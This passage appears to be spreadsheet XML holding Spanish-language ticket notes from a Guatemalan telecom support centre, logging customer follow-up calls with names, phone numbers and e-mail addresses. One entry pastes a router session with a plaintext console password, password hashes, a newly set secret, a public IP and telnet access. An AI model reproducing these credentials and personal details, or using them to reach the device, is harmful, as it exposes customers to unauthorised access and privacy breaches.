    <t>F4622651</t>
  </si>
  <si>
    <t>SE LLAMA  ACLIENTE   IVON CASTELLANOS 50004426 MENCIONA QUE TODO ESTA FUNCIONANDO BIEN
CLIENTE SOLICITA LLAMADA A LAS 14:30
-ID 3001122295</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   IVON CASTELLANOS 50004426 MENCIONA QUE NO HA PRESENTADO PROBLEMA POR LO QUE SOLICITA SEGUIMIENTO MAÑANA A LAS 8:30 HRS VALIDAR EL FUNCIONAMIENTO
-ID 3001178135</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  IVON CASTELLANOS 50004426 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001266364</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  IVON CASTELLANOS 50004426 MENCIONA QUE YA PUEDE SACAR Y RECIBIR LLAMADAS PERO SOLICITA LLAMADA PARA LAS 11:00 HRS PORQUE EL INCONVENIENTE SE DA MUY SEGUIDO
-ID 3001079951</t>
  </si>
  <si>
    <t>F4622668</t>
  </si>
  <si>
    <t>SE ENVIA CORREO NOTIFICANDO DE ENLACE OPERATIVO
DE: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 15:56
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; EDGAR JOSÉ MARTINEZ MÉNDEZ &lt;EDGAR.MARTINEZ@SOMOSCMI.COM&gt;; LESTER IVAN KROLIK MORALES &lt;LESTER.KROLIK@SOMOSCMI.COM&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: C174 - CAÍDO INTERNET CLARO - CON ID 38300510
ESTIMADO CLIENTE
    HACEMOS DE SU CONOCIMIENTO QUE SE ENCONTRO POE DESCONECTADA DE LA ENERGÍA ELECTRICA, SE NORMALIZA,
QUEDANDO AP OPERATIVO NUEVAMENTE.
AGRADECEMOS SU ATENCIÓN.
SALUDOS</t>
  </si>
  <si>
    <t>F4622691</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78423620 SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001083846</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78598805 MENCIONA QUE ERA INCONVENIENTE A NIVEL INTERNO
CLIENTE CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001139811</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE QUIEN INDICA QUE ESTARIA TRASFIRIENDO LA LLAMADA A PERSONAL EN SITIO QUE ESTA REVISANDO LAS CONEXIONES AL PARECER ESTAN REALIZANDO MANTENIMIENTO PERO CORTA LLAMADA.
78423620</t>
  </si>
  <si>
    <t>SEGUN CL EN PR INDICA QUE PERSONAL EN SITIO ESTA REVISANDO. COMENTA QUE SE LLAME A CENTRAL
CONVERSANDO CON CENTRAL INDICA QUE HAY PERSONAL REVISANDO A NIVEL INTERNO YA QUE CREEN QUE EL DHCP ES EL QUE DEJO DE FUNCIONAR ESTIMA FINALIZAR A LAS 10:30 LAS REVISIONES, SOLICITA LLAMADA ADICIONAL INDICA QUE SE LLAME AL SEGUNDO NUMERO DE PR</t>
  </si>
  <si>
    <t>F4622692</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  77360822  RESPONDE LISANDRO MENCIONA QUE  EL CC SE QUEDO SIN ENERGIA PERO YA RETORNO Y TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 3001085416</t>
  </si>
  <si>
    <t>F4622696</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE ANTONIO CORZO 57177268 SE CONTACTA A CL Y SE DEJA EN LINEA CON GESTOR **
-ID 3001316211
**</t>
  </si>
  <si>
    <t>F4622708</t>
  </si>
  <si>
    <t>SE LLAMA CLIENTE KATIA PONCE 88210403 MENCIONA QUE NO QUIERE TOCAR NINGUN EQUIPO POR SEGURIDAD
-ID 3001090091
NOMBRE DEL CLIENTE: INVERSIONES DOM
UBICACIÓN:PASAJE MIDENCE SOTO, 1ER NIVEL KIOSKO CERCA DEL EXPRESO AMERICANO, FRANCISCO MORAZAN
CONTACTO EN SITIO: KATIA PONCE 88210403
HORARIO DE ATENCION:9:00 - 17:00 HRS
GESTIÓN DE PERMISOS: DATOS DE VISITA -- CARLOS.TRIMINIO@DOMHN.COM</t>
  </si>
  <si>
    <t>F4622720</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN ROBLES AL 58794781 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID  3001087783
**</t>
  </si>
  <si>
    <t>F4622721</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. VELASQUEZ 32401131 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001209125 - 3001209290</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. VELASQUEZ 32401131 MENCIONA QUE UN POSTE DE ALUMBRADO PUBLICO SE CAYO Y PASO LLEVANDO VARIOS CABLES, CLIENTE INDICA QUE TIENE DESCONECTADOS LOS EQUIPOS PORQUE LA ENERGIA NO ESTABLE Y PARA QUE LOS EQUIPOS NO SUFRAN DAÑO
CLIENTE SOLICITA SE DE SEGUIMIENTO MAÑANA AL MEDIO DIA
-ID 3001222993</t>
  </si>
  <si>
    <t>F4622726</t>
  </si>
  <si>
    <t>SE LLAMO A MONITOREO DE CAJERO 5B ATIENE OSCAR PORTILLO QUIEN INDICA QUE EL CAJERO SE ENCUENTRA FUERA DEBEDIO A REMODELACIONES EN EL LUGAR, ESTIMA QUE FINALICEN EL 13 DE JULIO PROXIMADAMENTE
RESULTADO: LLAMADA HECHA
NOMBRE: 24207210
NÚMERO: 24207210
INICIO: HOY, 13:25
FIN: HOY, 13:30
DURACIÓN: 4:19
ID DE LLAMADA: 1001140315</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: JUEVES, 30 DE JUNIO DE 2022 9:0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ATM0692
ESTIMADO CLIENTE,
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2726
ID: 47502527T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0692
UBICADO EN: CAJERO 692 BRIGADA DE PARACAIDISTA FELIPE CRUZ ANTIGUA CARR AL PTO SAN JOSE ESCUINTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4622727</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 3329-3633 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001095483</t>
  </si>
  <si>
    <t>F4622728</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL RAMIREZ 71406428 MENCIONA QUE EL SERVICIO ES MUY LENTO
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001096628</t>
  </si>
  <si>
    <t>F4622729</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR MENCHU AL 53010135  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001134031
**</t>
  </si>
  <si>
    <t>F4622731</t>
  </si>
  <si>
    <t>CLIENTE GABRIEL RAMIREZ 58880035 REALIZA PRUEBAS DE LLAMADAS ENTRANTES Y SALIENTES Y VALIDA QUE EL E1 YA SE ENCUENTRA OPERATIVO. AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 58880035
NÚMERO: 011 50258880035
INICIO: HOY, 09:34 A. M.
FIN: HOY, 09:48 A. M.
DURACIÓN: 14:11
ID DE LLAMADA: 3001088997</t>
  </si>
  <si>
    <t>CLIENTE GABRIEL RAMIREZ 58880035  APOYA REINICIANDO AETHRA 6044, YA SE TIENE RESPUESTA A NIVEL DE IP . ID3001088997
&lt;GNCYGTAKN2D1C07A03EIM5&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE IP_PBX_ACCESO 10.78.165.86
  PING 10.78.165.86: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    ...................!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.78.165.86 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1479 PACKET(S) RECEIVED
    1.40% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/15 MS</t>
  </si>
  <si>
    <t>F4622735</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELMER CARDONA 40422160 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001102371 - 3001102667</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ELMER CARDONA 40422160 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001137869
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELMER CARDONA 40422160 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001126193 - 3001126362</t>
  </si>
  <si>
    <t>F4622738</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELMER CARDONA 40422160 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001094779</t>
  </si>
  <si>
    <t>F4622744</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SCARLET MANZANERO AL 41753805 NO RESPONDE, ENVIA A BUZON DE VOZ || SE INTENTARA LUEGO **
-ID 3001100027
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SCARLET MANZANERO AL 41753805 SOLICITA QUE SE LLAME EN 20 MINUTOS PARA CONFIRMAR **
-ID 3001088868
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SCARLET MANZANERO 41753805 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001126664
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SCARLET MANZANERO 41753805 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001103679</t>
  </si>
  <si>
    <t>F4622751</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN FUENTES 49872286 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001104078</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SELVIN FUENTES 49872286 MENCIONA QUE NO HAY ENERGIA EN PR
-ID 3001127512</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN FUENTES 49872286 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001087362</t>
  </si>
  <si>
    <t>F4622752</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO RAFAEL AL 30162329  CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001093991
**</t>
  </si>
  <si>
    <t>SE CONTACTA YULISSA MENDEZ DEL 31105775 ID 3001093940 PARA EL SEGUIMIENTO DE SU TICKET Y SE VALIDA QUE YA ESTA SOLVENTADO Y CONFIRMA CON SU PR Y EN EFECTO ESTA OPERATIVO, CONFIRMA EL CIERRE DE TICKET. PERO SE VALIDA QUE EL TICKET ESTA EN PC NO APLICA SE PASA A WIP Y SE NOTIFICA AL GESTOR YENSI.CALGUA VIA SKYPE PARA EL CAMBIO DE ESTADO</t>
  </si>
  <si>
    <t>F4622758</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE SERGIO GARCIA. QUIEN INDICA QUE HAY UNOS CABLES TIRADOS Y NO SABE SI SON DE CLARO O DE OTRO PROVEEDOR.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUILLERMO AGREDA AL 73772275 - 22463400 CONTESTA EL SEÑOR JORGE FLORES INDICA QUE EL LO QUE ESTA REPORTANDO ES QUE UNOS CABLES QUE ESTAN CAIDOS AFUERA DE LA OFICINA || SE NOTIFICA A GESTOR **
-ID 3001096321 - 3001096439
**</t>
  </si>
  <si>
    <t>F4622762</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA CLIENTE FRANCKLIN ORELLANA SE VERIFICA F4622762 EN PC Y SIN GESTOR ASIGNADO, SE LE INFORMA QUE ES NECESARIO REALIZAR PRUEBAS DE 1N, POR LO QUE ÉL MISMO CONTACTA AL PR Y SOLICITA QUE SE COLOQUE AL GESTOR EN LÍNEA PARA DARLE SEGUIMIENTO AL CASO, SE CONTACTA A CNOC Y ATIENDE JHONNSER.ESCOBAR Y SE DEJA EN CONFERENCIA CLIENTE DE LA CENTRAL Y PR CON GESTOR*/*/*/</t>
  </si>
  <si>
    <t>F4622765</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCKLIN ORELLANA AL 44990369 NO RESPONDE SE INTENTARA LUEGO **
-ID 3001100707
**</t>
  </si>
  <si>
    <t>F4622769</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR BILLY CARDONA 36376508 ID: 3001100591 INDICA QUE ÉL ES DEL TURNO PM, PERO QUE SE LE PUEDE LLAMAR A JOSE FRANCISCO AL 42396925*/*/*/*/
//SE LLAMA A JOSE FRANCISCO 42396925 ID: 3001101302, SE PROCEDE A CONTACTAR A GESTOR MIGUELAN.RODRIGUEZ 5147 ID: 3001101472 NO RESPONDE, LOCUCIÓN INDICA QUE ESTA EN OTRA LLAMADA, SE LE CITA POR SKYPE Y NO RESPONDE, SE LLAMA A CNOC ID: 3001101648 ATIENDE YENSI.CALGUA Y SE DEJA EN CONFERENCIA CLIENTE/GESTORA*/*/*/</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO 38307027 NO CONTESTO IVR ENVIA A BUZON, ID: 3001092232.</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO 77723241 SIGUE SIN RESPONDER ID: 3001092417.</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO 77723241 SIGUE SIN RESPONDER ...</t>
  </si>
  <si>
    <t>SE LLAMA A ENCARGADO 38307027 NO CONTESTO IVR ENVIA A BUZON, ID: 3001085426.</t>
  </si>
  <si>
    <t>F4622777</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTORIANO ANTON AL 58092353 SE LE SOLICITA SI PUEDE REINICIAR EL EQUIPO CLIENTE REINICIA PERO NO LEVANTA SE SOLICITAN DATOS DE VISITA Y BRINDAN LOS SIGUIENTES**
HORARIO DE ATENCION: 8:00 A 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADO
DIRECCCION: MUNICIPIO TELICA DEL JUZGADO UNA CUADRA AL NORTE.
ATENDERA EN SITIO: HAZEL BOJORQUEZ
-ID 3001112762
**</t>
  </si>
  <si>
    <t>**SE LLAMA A A CLIENTE  HAZEL 81167552 INDICA QUE SE ENCUENTRA EN SITIO Y QUE AUN NO CUENTA CON SERVICIO DE INTERNET || SE NOTIFICA A GESTOR **
-ID 3001106071
**</t>
  </si>
  <si>
    <t>**SE LLAMA A A CLIENTE  HAZEL 81167552 INDICA QUE SALIO DE LA OFICINA SOLICITA QUE SE LLAME AL SEÑOR VICTORIANO ANTON AL 58092353 **
-ID 3001111866
**</t>
  </si>
  <si>
    <t>F4622811</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTY AL 70588234 INDICA QUE AUN NO CUENTA CON SERVICIO INDICA QUE LE LLAMARON Y REALIZARON PRUEBAS Y LE INDICARON QUE LE HIBAN A VOLVER A LLAMAR CL A ESPERA DE LA LAMADA || SE NOTIFICA A GESTOR **
-ID 3001109962
**</t>
  </si>
  <si>
    <t>F4622815</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE SALOMON ESCOBAR 75152394, QUIEN VA APOYAR A REVISAR EQUIPOS.
PWR EN VERDE, ALM EN ROJO SYNC EN VERDE FIJOS.
CLIENTE APAGO EL EQUIPO Y SE ALARMA CON AIS.
DESPUES DEL RESET EL SERVICIO NO LEVANTA.</t>
  </si>
  <si>
    <t>F4622827</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRUNO GONZALEZ 48050693  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE SOLICITA EL CAMBIO DE EQUIPO, SE LE MENCIONA QUE ES DIRECTAMENTE CON EL EJECUTIVO
-ID 3001093715</t>
  </si>
  <si>
    <t>F4622837</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KATIRIA 59774814 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001200871
**</t>
  </si>
  <si>
    <t>F4622843</t>
  </si>
  <si>
    <t>SE GENERA F4622897
||| CAID ATOTAL || ATN  QCOAGTLMN1W1A02A19ENM2  COATEPEQUE|| IP  10.105.51.92 | MASIVO_GT ||</t>
  </si>
  <si>
    <t>F4622846</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAGDA OCHAETA 42600504 MENCIONA QUE PERSISTE LA LENTITD
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 30011335059</t>
  </si>
  <si>
    <t>-* ISRAEL GONZALES 52988845 (CLIENTE) NO RESPONDE SE LLAMARA LUEGO
3001169405</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 16:39
PARA: DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; CIGONZALES@GENESISEMPRESARIAL.COM &lt;CIGONZALES@GENESISEMPRESARIAL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: RENDIMIENTO 921500037T
*-*-*--*-*</t>
  </si>
  <si>
    <t>F4622854</t>
  </si>
  <si>
    <t>CLIENTE RODRIGO ROMERO 78412751 INDICA QUE EL SERVICIO HA ESTADO INESTABLE, INDICA QUE POR MOMENTO SE CAE Y LEVANTA. SE CORRE PRUEBA DE CALIDAD EN EL PUERTO DEL MSAN Y SE PERCIBE INCREMENTO DE SLIPS. SE SOLICITARÁ LA CERTIFICACIÓN DEL E1. CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS.
ID DE LLAMADA: 3001097866</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE  RODRIGO ROMERO AL 78412751  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001203573 - 3001203721
**</t>
  </si>
  <si>
    <t>F4622867</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBEN PALENCIA 48284927  MENCIONA QUE YA APLICARON REINCIO AL EQUIPO CISCO PERO EL EQUIPO NO BRINDA NINGUNA LUZ LED, SE SOLICITAN DATOS DE VISITA
-ID 3001106702
NOMBRE DEL CLIENTE: CERAMICA HISPANO CENTROAMERICANA, S.A.
UBICACIÓN:KM 57.5 AL ATLANTICO SOBRE LA CARR. PRINCIPAL SANARATE
CONTACTO EN SITIO: ROBEN PALENCIA - 48284927
HORARIO DE ATENCION:HASTA LAS 16 HRS
GESTIÓN DE PERMISOS:MENCIONAR EN GARITA QUE VAN CON ROBEN PALENCIA - 48284927</t>
  </si>
  <si>
    <t>###SE ESTABA CAMBIANDO CREDENCIALES CORRECTAS DEL EQUIPO GESTION IP  Y NETWORKS ENCRIPTADO##
ENLACE UP Y SIN  PERDIDAS CLIENTE VALIDA ENLACE EN LLAMADA CON TECNICO PARA EL CIERRE DE TICKET
3001167636
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 58262618
NÚMERO: 58262618
DURACIÓN: 0:08:45
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58262618
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 30/06/2022 14:01:28
USERNAME: GESTIONIP
PASSWORD:
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57&gt;ENABLE
PASSWORD:
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 1460 BYTES
!
! LAST CONFIGURATION CHANGE AT 19:28:01 UTC THU JUN 30 2022
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$GDXO$R65/Q7LDLES1CIOOTLEUE/
!
NO AAA NEW-MODEL
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX1845831J
!
!
USERNAME GESTIONIP SECRET 5 $1$TWND$2SBCZESHYL8XIWWJIZN3Q/
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.191.167 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/238700008T/_/
 MTU 1600
 BANDWIDTH 25600
 IP ADDRESS 10.103.98.26 255.255.255.224
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 25600
 IP ADDRESS 190.149.175.217 255.255.255.252
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.103.98.1
!
!
!
!
CONTROL-PLANE
!
!
!
LINE CON 0
 PASSWORD TELGUA
 LOGIN LOCAL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#CONF T
ENTER CONFIGURATION COMMANDS, ONE PER LINE.  END WITH CNTL/Z.
CC_CERAMICA_HISPANO_(CONFIG)#NO USERNAME GESTIONIP SECRET 5 $1$TWND$2SBCZESHYL8XIWWJIZN3Q/
CC_CERAMICA_HISPANO_(CONFIG)#USERNAME GESTIONIP SECRET NE7W0RK$
CC_CERAMICA_HISPANO_(CONFIG)#
CC_CERAMICA_HISPANO_(CONFIG)#
CC_CERAMICA_HISPANO_(CONFIG)#
CC_CERAMICA_HISPANO_(CONFIG)#^Z
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#EXIT
INFO: THE CONNECTION WAS CLOSED BY THE REMOTE HOST.
&lt;YGUAGTGUN1D1C00A03EIM1&gt;}
                        ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;YGUAGTGUN1D1C00A03EIM1&gt;TELNET VPN INTERNET_GT_DEPTAL 10.103.98.26
TRYING 10.103.98.26 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.103.98.26 ...
USER ACCESS VERIFICATION
USERNAME: GESTIONIP
PASSWORD:
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57&gt;@T7AC43D
% BAD IP ADDRESS OR HOST NAME
% UNKNOWN COMMAND OR COMPUTER NAME, OR UNABLE TO FIND COMPUTER ADDRESS
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57&gt;ENABLE
PASSWORD:
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW RUN
CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57#SHOW RUNNING-CONFIG
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 1460 BYTES
!
! LAST CONFIGURATION CHANGE AT 19:32:46 UTC THU JUN 30 2022
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
NO SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_CERAMICA_HISPANO_GT_INTERNET_SANARATE_KM57
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$GDXO$R65/Q7LDLES1CIOOTLEUE/
!
NO AAA NEW-MODEL
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX1845831J
!
!
USERNAME GESTIONIP SECRET 5 $1$10/G$Z/YR2BSWNVSWAH3CBOAEY0
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.191.167 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/238700008T/_/
 MTU 1600
 BANDWIDTH 25600
 IP ADDRESS 10.103.98.26 255.255.255.224
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 25600
 IP ADDRESS 190.149.175.217 255.255.255.252
 DUPLEX AUTO
